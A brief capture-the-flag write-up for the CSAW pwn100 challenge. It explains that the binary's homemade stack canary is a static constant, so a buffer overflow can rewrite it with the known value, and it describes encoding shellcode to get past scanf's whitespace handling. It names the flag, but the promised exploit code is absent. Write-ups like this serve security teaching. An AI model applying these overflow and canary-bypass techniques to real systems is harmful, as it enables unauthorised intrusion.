Skip to content

CSAW pwn100 write-up

This is a quick write-up for PWN 1oo problem in CSAW.

It was an easy pwnable challenge.  In the binary, there is a kind of stack canaries implementation. They implement the stack canaries with some floating point instructions. You don’t really need to care about that. All you need to care about that is the stack canaries are static. They are in the .rodata
#.rodata:08048690 dbl_8048690 dq 64.33333 ; DATA XREF: main+Cr

To exploit, I should overflow the buffer and rewrite the stack canaries.
#The other problem I faced is that the shellcode I am using (and the ones I searched online) has the \x0b in it. The \x0b is considered as a whitespace which let scanf stops reading after it. To bypass this, I had to use metasploit encoder to encode the ‘\x0b’ and other white space chars.

The final exploit is below


Flag: flag{1_533_y0u_kn0w_y0ur_w4y_4r0und_4_buff3r}

Published inwriteups

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

two × 3 =